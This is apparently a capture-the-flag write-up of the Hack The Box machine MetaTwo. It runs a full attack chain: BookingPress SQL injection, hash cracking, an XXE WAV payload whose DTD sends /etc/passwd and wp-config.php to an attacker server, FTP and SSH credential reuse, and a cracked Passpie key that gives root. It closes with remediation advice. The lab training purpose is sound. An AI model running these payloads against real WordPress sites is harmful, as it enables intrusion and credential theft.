███╗ ███╗███████╗████████╗ █████╗ ████████╗██╗ ██╗ ██████╗
████╗ ████║██╔════╝╚══██╔══╝██╔══██╗╚══██╔══╝██║ ██║██╔═══██╗
██╔████╔██║█████╗ ██║ ███████║ ██║ ██║ █╗ ██║██║ ██║
██║╚██╔╝██║██╔══╝ ██║ ██╔══██║ ██║ ██║███╗██║██║ ██║
██║ ╚═╝ ██║███████╗ ██║ ██║ ██║ ██║ ╚███╔███╔╝╚██████╔╝
╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═════╝
┌──────────────────────────────────────────────────────────────────────────────┐
│░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░│
│░ ██████╗ ███████╗███╗ ██╗███████╗████████╗██████╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ ░│
│░ ██╔══██╗██╔════╝████╗ ██║██╔════╝╚══██╔══╝██╔══██╗██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ ░│
│░ ██████╔╝█████╗ ██╔██╗ ██║█████╗ ██║ ██████╔╝███████║ ██║ ██║██║ ██║██╔██╗ ██║ ░│
│░ ██╔═══╝ ██╔══╝ ██║╚██╗██║██╔══╝ ██║ ██╔══██╗██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ ░│
│░ ██║ ███████╗██║ ╚████║███████╗ ██║ ██║ ██║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ░│
│░ ╚═╝ ╚══════╝╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ░│
│░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░│
│ W O R D P R E S S // E X P L O I T A T I O N │
└──────────────────────────────────────────────────────────────────────────────┘
╔══════════════════════════════════════════════════════════════════════════════════╗
║ ATTACK VECTORS ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ [+] WordPress Enumeration & Vulnerability Scanning ║
║ [+] BookingPress SQL Injection (CVE-2022-0739) ║
║ [+] WordPress Hash Cracking with Hashcat ║
║ [+] XML External Entity Injection (CVE-2021-29447) ║
║ [+] File Disclosure via Crafted WAV Upload ║
║ [+] FTP Enumeration & Credential Harvesting ║
║ [+] PGP Private Key Cracking with John the Ripper ║
║ [+] Passpie Password Manager Exploitation ║
╚══════════════════════════════════════════════════════════════════════════════════╝
- >_ TARGET ACQUISITION
- >_ INITIAL RECONNAISSANCE
- >_ WEB ENUMERATION
- >_ FOOTHOLD // SQL INJECTION
- >_ XXE FILE DISCLOSURE
- >_ FTP ENUMERATION
- >_ INITIAL ACCESS
- >_ PRIVILEGE ESCALATION
- >_ SYSTEM ACCESS OBTAINED
- >_ CREDENTIALS VAULT
- >_ MITRE ATT&CK MAPPING
┌─────────────────────────────────────────────────────────────────────────────────┐
│ T A R G E T I N F I L T R A T I O N P A R A M E T E R S │
├─────────────────────────────────────────────────────────────────────────────────┤
│ IP ADDRESS........: 10.10.11.186 │
│ HOSTNAME..........: metapress.htb │
│ DOMAIN............: metapress.htb │
│ OPERATING SYSTEM..: Debian 11 (Linux 5.10.0-19-amd64) │
│ DIFFICULTY........: Easy │
│ ATTACK SURFACE....: WordPress Web Application │
│ KEY SERVICES......: FTP, SSH, HTTP (nginx) │
└─────────────────────────────────────────────────────────────────────────────────┘
Add target to /etc/hosts:
echo "10.10.11.186 metapress.htb" | sudo tee -a /etc/hostsComprehensive port scan:
rustscan -a $RHOST --ulimit 5000 -r 1-65535 -- -A -oA HTB-MetaTwo-ScanScan Results:
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD Server (Debian)
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1
80/tcp open http nginx 1.18.0
Critical Ports Identified:
| Port | Service | Significance |
|---|---|---|
| 21 | FTP | ProFTPD (Debian) - Requires credentials |
| 22 | SSH | OpenSSH 8.4p1 Debian - Standard SSH service |
| 80 | HTTP | nginx 1.18.0 - Redirects to metapress.htb |
┌──────────────────────────────────────────────────────────────────────┐
│ KEY FINDINGS │
├──────────────────────────────────────────────────────────────────────┤
│ [+] HTTP redirects to metapress.htb - WordPress site │
│ [+] FTP service available - credentials needed │
│ [+] Debian 11 system with standard services │
└──────────────────────────────────────────────────────────────────────┘
Figure 1: Website homepage showing MetaPress corporate site
Figure 2: Technology stack analysis via Wappalyzer
Key findings from Wappalyzer:
- WordPress 5.6.2
- PHP 8.0.24
- nginx 1.18.0
╔══════════════════════════════════════════════════════════════════════════════════╗
║ WORDPRESS VERSION IDENTIFIED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ VERSION: 5.6.2 (Released 2021-02-22) ║
║ STATUS: Insecure - Multiple known vulnerabilities ║
╚══════════════════════════════════════════════════════════════════════════════════╝
With WordPress version 5.6.2 identified, checked WPScan vulnerability database:
WPScan Database Search Results:
wpscan --url http://metapress.htb/ --api-token $API -e╔══════════════════════════════════════════════════════════════════════════════════╗
║ CRITICAL VULNERABILITIES IDENTIFIED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ WordPress Version: 5.6.2 (Insecure, released 2021-02-22) ║
║ ║
║ CVE-2021-29447 - XXE in Media Library (PHP 8) ║
║ - WPScan: https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5 ║
║ - Authenticated XXE affecting PHP 8 ║
║ - Can read arbitrary files via crafted WAV file upload ║
║ ║
║ CVE-2022-0739 - BookingPress SQL Injection ║
║ - Unauthenticated SQLi in BookingPress < 1.0.11 ║
║ - Can extract database credentials and hashes ║
╚══════════════════════════════════════════════════════════════════════════════════╝
Figure 3: Events page with BookingPress plugin vulnerable to SQLi
╔══════════════════════════════════════════════════════════════════════════════════╗
║ VULNERABILITY IDENTIFIED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ TYPE......: BookingPress Unauthenticated SQL Injection ║
║ CVE.......: CVE-2022-0739 ║
║ SEVERITY..: CRITICAL ║
║ IMPACT....: Database enumeration, credential extraction ║
╚══════════════════════════════════════════════════════════════════════════════════╝
Figure 4: BookingPress SQLi vulnerability reference
Figure 5: Proof of concept documentation
First, obtain the nonce value from the page source:
curl -s http://metapress.htb/ | grep "wpnonce"Figure 6: Finding wpnonce value in page source
Test SQL injection manually:
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=6cf26b4ef7&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'Response confirms vulnerability:
[{"bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1","bookingpress_category_id":"Debian 11","bookingpress_service_name":"debian-linux-gnu"...}]Enumerate databases:
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" \
--data="action=bookingpress_front_get_category_services&_wpnonce=6cf26b4ef7&category_id=33&total_service=1" \
-p total_service \
--batch \
--dbs \
--level=5 \
--risk=3Databases found: blog, information_schema
Dump wp_users table:
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" \
--data="action=bookingpress_front_get_category_services&_wpnonce=6cf26b4ef7&category_id=33&total_service=1" \
-p total_service \
--level=5 \
--risk=3 \
-D blog \
-T wp_users \
--dumpWordPress users extracted:
admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
Figure 7: Hash identification showing WordPress phpass format (mode 400)
hashcat -m 400 wpUsers.hash --wordlist wordlists/rockyou.txt --username╔══════════════════════════════════════════════════════════════════════════════════╗
║ PASSWORD CRACKED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ USERNAME: manager ║
║ PASSWORD: partylikearockstar ║
╚══════════════════════════════════════════════════════════════════════════════════╝
After obtaining manager credentials via SQLi, the next attack vector was CVE-2021-29447 - discovered through WPScan vulnerability database lookup for WordPress 5.6.2.
WPScan Vulnerability Details:
- CVE-2021-29447 - WordPress XXE via Media Library
- Affects WordPress 5.6.0 to 5.7.0 (with PHP 8)
- Requires authenticated access (which we now have via manager account)
- Exploited via malicious WAV file upload to Media Library
╔══════════════════════════════════════════════════════════════════════════════════╗
║ VULNERABILITY IDENTIFIED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ TYPE......: WordPress XXE in Media Library ║
║ CVE.......: CVE-2021-29447 ║
║ WPSCAN ID.: cbbe6c17-b24e-4be4-8937-c78472a138b5 ║
║ SEVERITY..: CRITICAL (CVSS 9.8) ║
║ IMPACT....: Arbitrary file read, credential disclosure ║
║ REQUIRES..: Authenticated access (Contributor+ role) ║
╚══════════════════════════════════════════════════════════════════════════════════╝
Attack Prerequisites:
- ✅ WordPress version 5.6.2 (vulnerable)
- ✅ PHP 8.0.24 (required for XXE parsing)
- ✅ Authenticated user with upload permissions (manager account)
- ✅ Media Library access
Create evil.dtd file:
cat > evil.dtd << 'EOF'
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.16:8080/?p=%file;'>" >
EOFCreate payload.wav with proper WAV structure:
python3 << 'EOF'
import struct
# XXE payload
xxe_payload = b"""<?xml version='1.0'?>
<!DOCTYPE ANY[
<!ENTITY % remote SYSTEM 'http://10.10.16.16:8080/evil.dtd'>
%remote;%init;%trick;
]>"""
# Build proper WAV structure
riff = b'RIFF'
wave = b'WAVE'
fmt_chunk = b'fmt ' + struct.pack('<I', 16) + struct.pack('<HHIIHH', 1, 2, 44100, 176400, 4, 16)
# Embed XXE in iXML chunk
ixml = b'iXML' + struct.pack('<I', len(xxe_payload)) + xxe_payload
# Padding if needed
if len(xxe_payload) % 2:
ixml += b'\x00'
# Calculate total size
total_size = 4 + len(fmt_chunk) + len(ixml)
header = riff + struct.pack('<I', total_size) + wave
with open('payload.wav', 'wb') as f:
f.write(header + fmt_chunk + ixml)
EOFStart HTTP server to receive callbacks:
python3 -m http.server 8080Figure 8: WordPress Media Upload interface for XXE exploitation
Upload payload.wav to WordPress Media Library as manager user. The HTTP server receives base64 encoded file content.
Decode the received data:
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2Jpbjov..." | base64 -dUser discovered:
jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
Update evil.dtd to target WordPress configuration:
cat > evil.dtd << 'EOF'
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.16:8080/?p=%file;'>" >
EOFUpload payload.wav again and decode the response:
echo "PD9waHANCi8qKiBUaGUgbmFtZSBvZiB0aGUgZGF0YWJhc2UgZm9yIFdvcmRQcmVzcyAqLw0KZGVmaW5l..." | base64 -d╔══════════════════════════════════════════════════════════════════════════════════╗
║ FTP CREDENTIALS DISCOVERED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' ); ║
║ define( 'FTP_USER', 'metapress.htb' ); ║
║ define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' ); ║
║ define( 'FTP_HOST', 'ftp.metapress.htb' ); ║
╚══════════════════════════════════════════════════════════════════════════════════╝
ftp 10.10.11.186Name: metapress.htb
Password: 9NYS_ii@FyL_p5M2NvJ
FTP directory structure:
drwxr-xr-x 5 metapress.htb metapress.htb 4096 Oct 5 2022 blog
drwxr-xr-x 3 metapress.htb metapress.htb 4096 Oct 5 2022 mailer
Navigate to mailer directory:
ftp> cd mailer
ftp> ls
drwxr-xr-x 4 metapress.htb metapress.htb 4096 Oct 5 2022 PHPMailer
-rw-r--r-- 1 metapress.htb metapress.htb 1126 Jun 22 2022 send_email.php
Download and analyze send_email.php:
ftp> get send_email.phpFile contents reveal SSH credentials:
<?php
use PHPMailer\PHPMailer\PHPMailer;
// ...
$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";
$mail->SMTPSecure = "tls";
$mail->Port = 587;╔══════════════════════════════════════════════════════════════════════════════════╗
║ SSH CREDENTIALS DISCOVERED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ USERNAME: jnelson ║
║ PASSWORD: Cb4_JmWM8zUZWMu@Ys ║
╚══════════════════════════════════════════════════════════════════════════════════╝
ssh jnelson@metapress.htbjnelson@meta2:~$ ls
user.txt
jnelson@meta2:~$ cat user.txt
ab881{SNIP}jnelson@meta2:~$ ls -lah
total 32K
drwxr-xr-x 4 jnelson jnelson 4.0K Oct 25 2022 .
drwxr-xr-x 3 root root 4.0K Oct 5 2022 ..
lrwxrwxrwx 1 root root 9 Jun 26 2022 .bash_history -> /dev/null
-rw-r--r-- 1 jnelson jnelson 220 Jun 26 2022 .bash_logout
-rw-r--r-- 1 jnelson jnelson 3.5K Jun 26 2022 .bashrc
drwxr-xr-x 3 jnelson jnelson 4.0K Oct 25 2022 .local
dr-xr-x--- 3 jnelson jnelson 4.0K Oct 25 2022 .passpie
-rw-r--r-- 1 jnelson jnelson 807 Jun 26 2022 .profile
-rw-r----- 1 root jnelson 33 Jan 14 21:04 user.txt╔══════════════════════════════════════════════════════════════════════════════════╗
║ PRIVILEGE ESCALATION VECTOR IDENTIFIED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ TYPE......: Weak PGP Passphrase in Passpie Password Manager ║
║ SEVERITY..: CRITICAL ║
║ IMPACT....: Passpie stores encrypted passwords protected by PGP key ║
║ Cracking the passphrase reveals all stored credentials ║
╚══════════════════════════════════════════════════════════════════════════════════╝
jnelson@meta2:~$ cd .passpie
jnelson@meta2:~/.passpie$ ls -al
total 24
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 2022 .
drwxr-xr-x 4 jnelson jnelson 4096 Oct 25 2022 ..
-r-xr-x--- 1 jnelson jnelson 3 Jun 26 2022 .config
-r-xr-x--- 1 jnelson jnelson 5243 Jun 26 2022 .keys
dr-xr-x--- 2 jnelson jnelson 4096 Oct 25 2022 sshCopy .keys file to attacker machine:
scp jnelson@10.10.11.186:/home/jnelson/.passpie/.keys ./keysConvert PGP private key to John format:
gpg2john keys > priv-key.hashCrack with John the Ripper:
john priv-key.hash --wordlist=/usr/share/wordlists/rockyou.txtUsing default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort
blink182 (Passpie)
1g 0:00:00:01 DONE (2026-01-14 23:02)
╔══════════════════════════════════════════════════════════════════════════════════╗
║ PGP PASSPHRASE CRACKED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ PASSPHRASE: blink182 ║
╚══════════════════════════════════════════════════════════════════════════════════╝
jnelson@meta2:~/.passpie$ passpie export ~/password.db
Passphrase: blink182
jnelson@meta2:~$ cat ~/password.db
credentials:
- comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: !!python/unicode 'p7qfAZt4_A1xo_0x'
- comment: ''
fullname: jnelson@ssh
login: jnelson
modified: 2022-06-26 08:58:15.514422
name: ssh
password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
handler: passpie
version: 1.0╔══════════════════════════════════════════════════════════════════════════════════╗
║ ROOT PASSWORD OBTAINED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ USERNAME: root ║
║ PASSWORD: p7qfAZt4_A1xo_0x ║
╚══════════════════════════════════════════════════════════════════════════════════╝
jnelson@meta2:~$ su root
Password: p7qfAZt4_A1xo_0x
root@meta2:~# id
uid=0(root) gid=0(root) groups=0(root)
root@meta2:~# cat root.txt
76609{SNIP}╔═══════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ███████╗██╗ ██╗███████╗████████╗███████╗███╗ ███╗ ║
║ ██╔════╝╚██╗ ██╔╝██╔════╝╚══██╔══╝██╔════╝████╗ ████║ ║
║ ███████╗ ╚████╔╝ ███████╗ ██║ █████╗ ██╔████╔██║ ║
║ ╚════██║ ╚██╔╝ ╚════██║ ██║ ██╔══╝ ██║╚██╔╝██║ ║
║ ███████║ ██║ ███████║ ██║ ███████╗██║ ╚═╝ ██║ ║
║ ╚══════╝ ╚═╝ ╚══════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ║
║ ║
║ root@meta2:~# whoami ║
║ root ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
╔═══════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██╗ ██╗███████╗███████╗██████╗ ███████╗██╗ █████╗ ██████╗ ║
║ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██╔════╝██║ ██╔══██╗██╔════╝ ║
║ ██║ ██║███████╗█████╗ ██████╔╝ █████╗ ██║ ███████║██║ ███╗ ║
║ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ██╔══╝ ██║ ██╔══██║██║ ██║ ║
║ ╚██████╔╝███████║███████╗██║ ██║ ██║ ███████╗██║ ██║╚██████╔╝ ║
║ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ║
║ ║
║ LOCATION: /home/jnelson/user.txt ║
║ FLAG: ab881{SNIP} ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
╔═══════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗ ██████╗ ██████╗ ████████╗ ███████╗██╗ █████╗ ██████╗ ║
║ ██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝ ██╔════╝██║ ██╔══██╗██╔════╝ ║
║ ██████╔╝██║ ██║██║ ██║ ██║ █████╗ ██║ ███████║██║ ███╗ ║
║ ██╔══██╗██║ ██║██║ ██║ ██║ ██╔══╝ ██║ ██╔══██║██║ ██║ ║
║ ██║ ██║╚██████╔╝╚██████╔╝ ██║ ██║ ███████╗██║ ██║╚██████╔╝ ║
║ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ║
║ ║
║ LOCATION: /root/root.txt ║
║ FLAG: 76609{SNIP} ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ EXFILTRATED CREDENTIALS ║
╠════════════╦══════════════════╦════════════════════════════════════════════╦═══════════════════════════════╣
║ TYPE ║ USERNAME ║ PASSWORD / HASH ║ SOURCE ║
╠════════════╬══════════════════╬════════════════════════════════════════════╬═══════════════════════════════╣
║ WP Hash ║ admin ║ $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. ║ SQL Injection ║
║ WP Hash ║ manager ║ $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 ║ SQL Injection ║
║ Cleartext ║ manager ║ partylikearockstar ║ Hashcat Crack ║
║ DB Creds ║ blog ║ 635Aq@TdqrCwXFUZ ║ wp-config.php (XXE) ║
║ FTP ║ metapress.htb ║ 9NYS_ii@FyL_p5M2NvJ ║ wp-config.php (XXE) ║
║ SSH ║ jnelson ║ Cb4_JmWM8zUZWMu@Ys ║ send_email.php (FTP) ║
║ PGP Pass ║ Passpie ║ blink182 ║ John the Ripper ║
║ SSH ║ root ║ p7qfAZt4_A1xo_0x ║ Passpie Export ║
╚════════════╩══════════════════╩════════════════════════════════════════════╩═══════════════════════════════╝
| Tactic | Technique ID | Technique Name | Implementation |
|---|---|---|---|
| Reconnaissance | T1595.002 | Active Scanning | Rustscan/Nmap port enumeration |
| Initial Access | T1190 | Exploit Public Application | WordPress SQLi + XXE |
| Credential Access | T1110.002 | Password Cracking | Hashcat (WordPress), John (PGP) |
| Credential Access | T1552.001 | Credentials in Files | wp-config.php, send_email.php |
| Discovery | T1083 | File and Directory Discovery | FTP enumeration |
| Collection | T1005 | Data from Local System | XXE file disclosure |
| Privilege Escalation | T1552.004 | Private Keys | PGP key cracking |
| Tool | Purpose |
|---|---|
| rustscan | Fast port scanning |
| nmap | Service enumeration |
| wpscan | WordPress vulnerability scanning |
| sqlmap | SQL injection exploitation |
| hashcat | WordPress hash cracking (mode 400) |
| curl | Manual XXE exploitation |
| python3 | WAV payload generation |
| ftp | File transfer protocol client |
| john | PGP passphrase cracking |
| passpie | Password manager exploitation |
┌──────────────────────────────────────────────────────────────────────────────────┐
│ KEY TAKEAWAYS │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ [1] WordPress Plugin Vulnerabilities │
│ - Always keep WordPress and plugins updated │
│ - BookingPress < 1.0.11 has critical unauthenticated SQLi │
│ │
│ [2] XXE Exploitation Complexity │
│ - Proper WAV file structure required for PHP 8 XXE exploitation │
│ - Most online resources showed incorrect payload generation │
│ │
│ [3] Configuration File Security │
│ - wp-config.php often contains database and FTP credentials │
│ - Sensitive files should never be web-accessible │
│ │
│ [4] Credential Chain │
│ - Each credential led to the next system access │
│ - FTP → SSH → PGP → Root demonstrates lateral movement │
│ │
│ [5] Password Manager Security │
│ - Weak passphrases compromise all stored credentials │
│ - "blink182" is a terrible passphrase for protecting root access │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────┐
│ REMEDIATION │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ [1] BookingPress SQL Injection (CVE-2022-0739) │
│ - Issue: Unauthenticated SQL injection in BookingPress < 1.0.11 │
│ - Fix: Update BookingPress to >= 1.0.11 immediately │
│ │
│ [2] WordPress XXE (CVE-2021-29447) │
│ - Issue: XXE via malicious WAV files in WordPress 5.6-5.7 with PHP 8 │
│ - Fix: Update WordPress to >= 5.7.1, restrict file uploads │
│ │
│ [3] Hardcoded Credentials │
│ - Issue: Credentials stored in plaintext in configuration files │
│ - Fix: Use environment variables, secrets management, rotate passwords │
│ │
│ [4] Weak PGP Passphrase │
│ - Issue: Password manager protected by weak passphrase "blink182" │
│ - Fix: Use strong, random passphrases (20+ characters minimum) │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
Vulnerabilities:
- CVE-2021-29447 - WordPress XXE (WPScan Database)
- CVE-2021-29447 - WordPress XXE (SonarSource Analysis)
- CVE-2022-0739 - BookingPress SQLi (WPScan Database)
- WordPress 5.6.2 Vulnerability Lookup
- WordPress XXE PoC Video
Tools:
- WPScan - WordPress Security Scanner
- WPScan Vulnerability Database
- Wappalyzer - Technology Profiler
- SQLMap
- John the Ripper
- Passpie Password Manager
Techniques:
┌──────────────────────────────────────────────────────────────────────────────────┐
│ HOW TO FIND EXPLOITS & POC SCRIPTS │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ [1] IDENTIFY VERSION │
│ ▸ Use nmap, wappalyzer, banner grabbing to find service versions │
│ ▸ Check /readme.html, /license.txt for CMS versions │
│ ▸ Example: WordPress 5.6.2, BookingPress < 1.0.11 │
│ │
│ [2] SEARCH EXPLOIT-DB / SEARCHSPLOIT │
│ ▸ searchsploit wordpress 5.6 │
│ ▸ searchsploit bookingpress │
│ ▸ searchsploit proftpd │
│ ▸ https://www.exploit-db.com/ │
│ │
│ [3] SEARCH CVE DATABASES │
│ ▸ https://nvd.nist.gov/ (NIST National Vulnerability Database) │
│ ▸ https://cve.mitre.org/ (CVE List) │
│ ▸ https://cvedetails.com/ (CVE Details with PoC links) │
│ ▸ Search: "CVE-2022-0739", "CVE-2021-29447" │
│ │
│ [4] GITHUB POC REPOSITORIES │
│ ▸ Search: site:github.com CVE-2022-0739 │
│ ▸ https://github.com/nomi-sec/PoC-in-GitHub (PoC aggregator) │
│ ▸ https://github.com/trickest/cve (CVE PoC collection) │
│ │
│ [5] WORDPRESS-SPECIFIC RESOURCES │
│ ▸ https://wpscan.com/ (WPScan Vulnerability Database) │
│ ▸ https://wpscan.com/wordpress/562 (WP 5.6.2 vulnerabilities) │
│ ▸ wpscan --url <target> --api-token <token> -e vp,vt │
│ │
│ [6] SECURITY RESEARCH RESOURCES │
│ ▸ https://book.hacktricks.xyz/ (HackTricks) │
│ ▸ https://github.com/swisskyrepo/PayloadsAllTheThings │
│ ▸ https://pentestmonkey.net/ │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────┐
│ VULNERABILITIES IN THIS BOX - SEARCH QUERIES │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ CVE-2022-0739 (BookingPress SQLi) │
│ ▸ searchsploit bookingpress │
│ ▸ site:github.com CVE-2022-0739 exploit │
│ ▸ https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357 │
│ │
│ CVE-2021-29447 (WordPress XXE) │
│ ▸ site:github.com CVE-2021-29447 poc wav │
│ ▸ https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5 │
│ ▸ "wordpress xxe wav file" php 8 │
│ │
│ Passpie PGP Cracking │
│ ▸ gpg2john + john the ripper │
│ ▸ "passpie password manager crack" │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
╔══════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ░█▀▀░█░█░█▀▀░▀█▀░█▀▀░█▄█░░░█▀▀░█▀█░█▄█░█▀█░█▀▄░█▀█░█▄█░▀█▀░█▀▀░█▀▀░█▀▄ ║
║ ░▀▀█░░█░░▀▀█░░█░░█▀▀░█░█░░░█░░░█░█░█░█░█▀▀░█▀▄░█░█░█░█░░█░░▀▀█░█▀▀░█░█ ║
║ ░▀▀▀░░▀░░▀▀▀░░▀░░▀▀▀░▀░▀░░░▀▀▀░▀▀▀░▀░▀░▀░░░▀░▀░▀▀▀░▀░▀░▀▀▀░▀▀▀░▀▀▀░▀▀░ ║
║ ║
║ WRITEUP AUTHOR: Netrunner ║
║ COMPLETION DATE: 2026-01-14 ║
║ ATTACK CHAIN: SQLi > XXE > FTP > SSH > PGP Crack > Root ║
║ ║
╚══════════════════════════════════════════════════════════════════════════════════════╝
